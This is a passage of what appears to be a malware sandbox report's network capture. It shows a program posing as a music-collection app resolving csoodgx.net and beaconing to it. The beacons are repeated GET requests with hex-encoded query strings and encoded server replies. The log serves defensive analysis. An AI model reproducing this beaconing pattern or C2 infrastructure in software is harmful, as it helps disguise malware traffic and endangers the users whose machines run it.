                                                                          Mar 29, 2024 12:10:49.311074972 CET804979345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:49.311155081 CET4979380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:49.420073986 CET4979380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:49.420344114 CET4979480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:49.636442900 CET804979345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:49.636507988 CET4979380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:49.637762070 CET804979445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:49.637836933 CET4979480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:49.656204939 CET4979480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:49.874052048 CET804979445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:49.952958107 CET804979445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:49.953022957 CET4979480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:50.063564062 CET4979480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:50.063868046 CET4979580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:50.281263113 CET804979445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:50.281323910 CET4979480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:50.283160925 CET804979545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:50.283247948 CET4979580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:50.283368111 CET4979580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:50.502499104 CET804979545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:50.587368011 CET804979545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:50.587425947 CET4979580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:50.703926086 CET4979580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:50.704227924 CET4979680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:50.920310020 CET804979645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:50.920433044 CET4979680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:50.920566082 CET4979680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:50.923186064 CET804979545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:50.923243999 CET4979580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:51.136804104 CET804979645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:51.221873999 CET804979645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:51.222006083 CET4979680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:51.344204903 CET4979680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:51.344604969 CET4979780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:51.560338974 CET804979645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:51.560409069 CET4979680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:51.563654900 CET804979745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:51.563755035 CET4979780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:51.565444946 CET4979780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:51.808367014 CET804979745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:51.887362957 CET804979745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:51.887447119 CET4979780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:52.000514030 CET4979780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:52.000948906 CET4979880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:52.217242002 CET804979845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:52.217381954 CET4979880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:52.218008041 CET4979880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:52.219693899 CET804979745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:52.219768047 CET4979780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:52.434454918 CET804979845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:52.519275904 CET804979845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:52.519362926 CET4979880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:52.644016981 CET4979880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:52.644340038 CET4979980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:52.860438108 CET804979845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:52.860500097 CET4979880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:52.863452911 CET804979945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:52.863590956 CET4979980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:52.864072084 CET4979980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:53.083314896 CET804979945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:53.167071104 CET804979945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:53.167128086 CET4979980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:53.281848907 CET4979980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:53.281851053 CET4980080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:53.501188993 CET804979945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:53.501281023 CET4979980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:53.501326084 CET804980045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:53.501398087 CET4980080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:53.501609087 CET4980080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:53.720994949 CET804980045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:53.809508085 CET804980045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:53.810205936 CET4980080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:53.937788010 CET4980080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:53.938235998 CET4980180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:54.154721022 CET804980145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:54.154932976 CET4980180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:54.157298088 CET804980045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:54.157385111 CET4980080192.168.2.545.142.214.240

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Mar 29, 2024 12:09:44.802397013 CET5154053192.168.2.5141.98.234.31
                                                                          Mar 29, 2024 12:09:45.142661095 CET5351540141.98.234.31192.168.2.5

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Mar 29, 2024 12:09:44.802397013 CET192.168.2.5141.98.234.310xf7b9Standard query (0)csoodgx.netA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Mar 29, 2024 12:09:45.142661095 CET141.98.234.31192.168.2.50xf7b9No error (0)csoodgx.net45.142.214.240A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • csoodgx.net

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.54971245.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:09:45.420994043 CET318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ef909339 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:45.725605965 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:45 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.54971345.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:09:46.064559937 CET318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ef909339 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:46.396110058 CET1286INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:46 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 35 32 65 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 63 38 31 63 34 35 39 66 65 38 62 64 32 65 39 31 66 31 65 66 35 61 32 35 63 65 39 31 35 38 35 62 63 63 66 62 35 66 62 63 34 30 61 64 39 30 38 38 62 65 38 64 65 32 32 36 36 65 32 30 38 61 36 62 62 39 64 35 39 32 64 65 30 37 37 34 36 61 63 37 64 66 66 37 39 61 38 33 62 35 35 64 65 66 66 64 31 30 66 63 61 34 30 63 64 37 64 62 62 31 31 66 37 33 36 39 34 32 35 65 37 30 65 61 37 36 30 63 34 34 64 62 38 65 36 34 34 65 38 35 61 37 66 34 38 65 64 32 37 36 32 38 62 33 61 36 66 38 66 65 31 31 30 63 36 66 31 39 34 39 63 33 66 63 37 36 65 39 36 31 36 64 38 35 62 38 65 32 32 62 33 34 37 62 32 65 61 35 66 33 66 65 66 37 39 64 35 65 33 37 63 62 39 38 35 65 65 64 35 34 61 65 36 33 35 63 61 31 65 32 62 35 63 35 32 32 30 66 64 32 33 37 37 31 36 36 32 62 31 65 36 38 65 66 65 38 36 32 36 35 37 65 33 34 32 37 39 32 30 65 30 32 62 35 65 66 33 65 32 65 35 38 38 66 38 33 34 37 61 61 34 65 64 34 37 39 39 38 36 66 62 37 64 33 39 31 30 62 66 37 36 65 64 39 39 63 63 61 63 36 34 64 34 36 64 30 66 32 39 33 31 36 34 61 37 35 36 63 62 63 33 61 66 33 39 32 61 61 34 63 38 30 36 61 36 30 31 62 30 61 38 33 33 62 38 63 35 63 30 33 37 37 63 33 34 30 61 64 35 32 65 65 38 31 30 66 30 64 30 62 62 30 64 34 63 64 32 33 66 31 38 63 30 35 30 63 35 66 32 36 36 39 38 33 33 62 35 39 32 35 37 62 63 65 33 64 31 61 63 63 61 33 38 32 33 62 65 37 38 62 36 65 63 30 32 39 65 62 65 62 64 37 31 35 64 62 65 38 35 66 32 33 66 61 38 66 38 38 66 38 35 31 66 65 64 31 66 65 33 35 39 38 35 35 32 36 64 63 37 62 34 64 66 66 63 64 63 34 61 37 39 61 33 39 64 65 38 33 30 61 65 37 34 38 39 30 66 33 63 61 61 32 62 64 30 32 36 64 63 39 65 30 30 64 35 35 38 62 37 32 66 30 33 31 34 35 62 63 62 64 37 36 65 35 37 33 61 35 62 36 30 39 62 66 65 39 30 32 63 32 62 37 65 34 64 31 33 63 39 63 38 62 32 31 30 31 33 66 36 64 37 62 63 65 38 63 33 33 35 37 63 37 64 66 39 33 37 38 63 64 63 30 34 30 38 34 36 39 37 61 39 63 34 30 33 34 37 34 35 64 63 37 38 36 62 35 38 33 36 34 64 66 64 64 32 64 30 64 32 66 31 63 65 35 35 39 36 33 64 36 63 34 65 66 35 37 35 33 31 39 63 32 61 62 37 63 39 38 64 37 65 38 61 34 61 63 31 38 62 32 30 31 36 30 65 36 31 39 64 66 63 39 66 65 32 31 64 31 31 61 30 32 66 39 34 64 39 31 31 37 30 31 64 64 63 33 65 63 63 66 65 39 30 30 64 37 36 33 35 37 61 39 63 33 64 30 37 66 33 35 64 34 36 37 38 37 39 38 66 34 65 63 34 62 61 61 31 65 32 33 65 61 32 64 31 63 32 31 30 35 39 38 35 32 35 64 36 34 61 35 36 39 33 62 33 64 33 36 32 63 63 35 30 33 64 62 32 36 32 65 30 32 64 32 36 62 33 36 34 38 62 35 63 31 66 64 31 61 35 61 35 61 39 37 31 61 35 63 35 30 39 38 63 34 66 64 65 64 34 63 61 34 62 61 64 31 30 62 63 34 32 66 32 61 62 61 65 36 34 39 62 62 30 32 66 61 62 32 65 32 62 30 64 33 35 63 65 38 39 37 39 31 63 65 39 61 31 63 30 34 35 37 61 66 36 32 36 33 38 33 34 31 35 31 63 64 61 33 30 61 33 34 33 61 66 31 63 39 32 34 31 64 64 61 62 63 39 39 34 34 64 65 37 34 30 38 39 39 65 62 31 63 31 32 61 31 30 64 33 32 66 32 65 61 65 38 35 35 65 63 31 35 61 30 36 30 61 34 61 63 63 34 30 31 33 34 31 33 62 34 33 30 61 66 61 39 64 34 61 34 39 61 30 30 38 33 32 63 61 66 32 61 30 31 63 63 61 66 35 37 31 62 30 65 35 66 63 66 35 31 39 32 37 36 65 64 66 30 30 63 65 63 37 31 37 61 36 35 61 66 65 34 30 32 61 37 33 61
                                                                          Data Ascii: 52e67b68a8a3203a77b0418f55f677c81c459fe8bd2e91f1ef5a25ce91585bccfb5fbc40ad9088be8de2266e208a6bb9d592de07746ac7dff79a83b55deffd10fca40cd7dbb11f7369425e70ea760c44db8e644e85a7f48ed27628b3a6f8fe110c6f1949c3fc76e9616d85b8e22b347b2ea5f3fef79d5e37cb985eed54ae635ca1e2b5c5220fd23771662b1e68efe862657e3427920e02b5ef3e2e588f8347aa4ed479986fb7d3910bf76ed99ccac64d46d0f293164a756cbc3af392aa4c806a601b0a833b8c5c0377c340ad52ee810f0d0bb0d4cd23f18c050c5f2669833b59257bce3d1acca3823be78b6ec029ebebd715dbe85f23fa8f88f851fed1fe35985526dc7b4dffcdc4a79a39de830ae74890f3caa2bd026dc9e00d558b72f03145bcbd76e573a5b609bfe902c2b7e4d13c9c8b21013f6d7bce8c3357c7df9378cdc04084697a9c4034745dc786b58364dfdd2d0d2f1ce55963d6c4ef575319c2ab7c98d7e8a4ac18b20160e619dfc9fe21d11a02f94d911701ddc3eccfe900d76357a9c3d07f35d4678798f4ec4baa1e23ea2d1c210598525d64a5693b3d362cc503db262e02d26b3648b5c1fd1a5a5a971a5c5098c4fded4ca4bad10bc42f2abae649bb02fab2e2b0d35ce89791ce9a1c0457af6263834151cda30a343af1c9241ddabc9944de740899eb1c12a10d32f2eae855ec15a060a4acc4013413b430afa9d4a49a00832caf2a01ccaf571b0e5fcf519276edf00cec717a65afe402a73a
                                                                          Mar 29, 2024 12:09:46.396125078 CET243INData Raw: 63 64 32 34 36 62 61 38 64 31 33 30 36 32 37 66 33 63 64 33 32 63 65 63 31 39 66 64 64 64 38 62 30 36 38 38 62 64 35 33 30 33 36 33 31 30 38 33 33 62 63 37 37 32 62 66 30 61 31 66 35 61 61 62 37 33 66 31 66 64 33 61 33 63 66 39 63 35 64 66 62 66
                                                                          Data Ascii: cd246ba8d130627f3cd32cec19fddd8b0688bd53036310833bc772bf0a1f5aab73f1fd3a3cf9c5dfbf8a1473914bc4244e9bb1c06bf99463efeaedbc5e5ccb1b8c254b294cdaf49cb751d48c574f3e631aabd7ff4d09953b90c389ccc7e867770f93d00e6b7c4b56bac1688da8ac9057b856679b81c01d841
                                                                          Mar 29, 2024 12:09:46.396133900 CET5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0
                                                                          Mar 29, 2024 12:09:48.936276913 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:49.290200949 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:49 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.54971645.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:09:49.624355078 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:49.931559086 CET1286INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:49 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 34 39 65 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 37 38 65 64 32 65 61 31 37 31 36 66 35 61 32 35 63 65 61 31 64 64 35 66 62 38 63 65 37 39 37 38 37 34 64 38 62 34 64 64 62 65 30 63 30 33 37 33 34 62 39 34 64 66 38 64 35 64 61 31 61 32 35 65 33 37 32 35 38 61 64 37 65 66 37 36 34 61 63 32 64 35 34 63 38 66 66 63 64 30 39 63 36 35 64 63 63 37 62 62 34 31 61 66 65 33 33 38 61 32 36 65 66 31 31 61 65 36 33 64 62 35 32 62 38 65 33 35 30 65 66 35 38 37 38 35 64 65 39 32 34 36 64 39 34 33 62 36 37 38 65 66 34 31 32 63 38 66 31 39 34 39 32 33 62 64 33 36 39 39 33 30 38 64 63 35 38 38 35 32 39 62 36 35 39 62 38 65 66 35 61 33 66 65 66 37 61 63 63 66 63 37 61 62 64 39 31 65 64 64 31 34 38 65 63 33 66 63 39 31 36 33 35 35 36 35 38 32 30 65 34 33 62 37 31 30 61 37 38 62 62 65 64 38 61 65 30 38 37 32 38 35 37 65 63 35 64 37 62 32 31 66 35 32 62 35 38 65 39 66 65 65 37 38 38 65 34 33 66 37 33 62 61 65 63 34 65 39 38 38 35 66 62 37 61 32 63 31 34 62 35 37 36 65 62 39 65 64 35 62 31 36 36 63 66 36 61 30 30 32 32 33 32 36 34 61 63 35 63 63 61 64 38 62 33 33 38 32 62 62 66 64 37 30 63 62 63 30 39 61 37 61 33 33 33 62 63 63 66 63 38 33 30 37 34 32 61 30 35 64 32 33 38 65 65 30 64 65 66 64 33 62 39 31 39 34 64 64 34 32 31 31 36 63 32 35 66 64 38 66 33 36 33 39 36 32 63 62 34 39 33 34 30 61 33 65 61 64 31 62 36 63 31 33 66 32 33 61 30 37 61 62 39 65 62 30 30 39 61 61 30 62 63 37 33 35 31 61 31 38 65 66 30 33 66 61 63 66 66 38 35 39 38 31 61 65 66 30 61 65 35 35 32 38 61 34 64 36 63 63 66 62 65 63 30 66 34 64 64 35 34 36 35 62 66 39 66 65 39 32 34 61 64 37 37 38 66 30 35 33 34 61 62 32 32 64 66 33 39 64 39 39 65 31 65 63 61 35 65 62 33 32 66 30 63 31 35 34 66 63 62 64 34 36 38 35 36 33 38 35 32 36 35 38 65 66 64 38 36 32 66 33 32 36 32 34 61 31 33 64 31 63 31 62 33 30 65 31 32 66 39 64 30 62 32 65 38 64 64 33 34 37 34 37 32 65 32 32 31 38 37 63 33 30 33 31 35 34 31 39 64 62 34 63 35 30 34 34 63 34 65 64 31 37 64 37 35 35 31 33 32 34 36 65 36 63 66 64 34 63 63 65 65 63 62 35 30 39 66 32 32 36 64 34 37 66 65 37 36 33 35 38 37 32 38 62 36 63 34 39 32 37 37 38 66 34 61 63 31 38 63 32 36 30 32 30 32 36 33 38 33 66 35 39 63 65 66 31 32 30 65 61 36 32 66 38 61 64 33 31 61 37 62 31 64 64 35 33 37 64 32 66 35 39 35 30 66 36 38 33 34 37 37 39 38 33 66 30 30 65 64 35 63 34 36 37 65 36 63 38 65 34 65 63 34 62 39 61 32 65 30 32 61 61 31 64 34 63 37 30 65 35 33 38 35 32 37 63 39 34 32 35 36 38 64 62 39 64 36 36 32 64 34 34 66 33 61 62 37 37 36 65 33 32 63 32 37 61 64 36 35 38 32 35 64 31 37 63 65 61 34 61 34 61 65 36 34 61 66 63 38 31 32 39 61 34 65 63 38 64 66 63 66 34 65 62 33 31 39 62 33 34 39 66 36 61 64 62 30 36 35 39 30 61 66 32 39 61 63 33 31 33 34 30 63 32 39 63 36 38 32 37 39 30 32 65 38 61 33 63 32 34 37 37 37 65 38 32 65 33 33 32 62 31 63 31 64 63 31 32 38 61 39 35 39 61 34 31 37 39 62 35 66 64 63 61 36 63 30 39 39 34 39 66 39 34 31 38 39 38 62 62 33 63 31 33 35 30 63 64 33 32 39 33 39 61 35 38 35 35 39 64 66 35 30 30 36 30 62 34 35 64 30 34 36 31 30 35 66 33 31 34 32 30 32 66 61 39 35 34 65 35 66 61 62 30 39 33 35 64 34 66 33 61 61 31 64 63 31 65 39 37 33 62 31 65 31 65 32 66 66 31 64 32 38 37 35 63 30 30 33 63 36 63 34 30 62 61 34 35 38 66 65 35 35 32 32 37 34 62
                                                                          Data Ascii: 49e67b69c953804b26b565fe95b321bd19a55f78ed2ea1716f5a25cea1dd5fb8ce797874d8b4ddbe0c03734b94df8d5da1a25e37258ad7ef764ac2d54c8ffcd09c65dcc7bb41afe338a26ef11ae63db52b8e350ef58785de9246d943b678ef412c8f194923bd3699308dc588529b659b8ef5a3fef7accfc7abd91edd148ec3fc91635565820e43b710a78bbed8ae0872857ec5d7b21f52b58e9fee788e43f73baec4e9885fb7a2c14b576eb9ed5b166cf6a00223264ac5ccad8b3382bbfd70cbc09a7a333bccfc830742a05d238ee0defd3b9194dd42116c25fd8f363962cb49340a3ead1b6c13f23a07ab9eb009aa0bc7351a18ef03facff85981aef0ae5528a4d6ccfbec0f4dd5465bf9fe924ad778f0534ab22df39d99e1eca5eb32f0c154fcbd468563852658efd862f32624a13d1c1b30e12f9d0b2e8dd347472e22187c30315419db4c5044c4ed17d75513246e6cfd4cceecb509f226d47fe76358728b6c492778f4ac18c2602026383f59cef120ea62f8ad31a7b1dd537d2f5950f683477983f00ed5c467e6c8e4ec4b9a2e02aa1d4c70e538527c942568db9d662d44f3ab776e32c27ad65825d17cea4a4ae64afc8129a4ec8dfcf4eb319b349f6adb06590af29ac31340c29c6827902e8a3c24777e82e332b1c1dc128a959a4179b5fdca6c09949f941898bb3c1350cd32939a58559df50060b45d046105f314202fa954e5fab0935d4f3aa1dc1e973b1e1e2ff1d2875c003c6c40ba458fe552274b
                                                                          Mar 29, 2024 12:09:49.931572914 CET104INData Raw: 31 64 31 34 36 61 34 38 63 31 30 30 31 33 32 66 61 63 34 32 65 63 63 63 33 38 31 64 63 64 64 62 30 37 64 38 62 64 64 33 37 32 32 33 31 30 39 33 61 61 32 37 35 32 32 66 31 62 66 66 64 62 32 62 35 33 37 31 64 63 64 61 32 63 37 39 61 34 38 66 35 66
                                                                          Data Ascii: 1d146a48c100132fac42eccc381dcddb07d8bdd372231093aa27522f1bffdb2b5371dcda2c79a48f5f4b54d390abd47740


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.54971845.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:09:50.438858986 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:50.743694067 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:50 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.54971945.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:09:51.076317072 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:51.380537033 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:51 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.54972045.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:09:51.717952967 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:52.015934944 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:51 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Mar 29, 2024 12:09:52.123640060 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:52.426903963 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:52 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
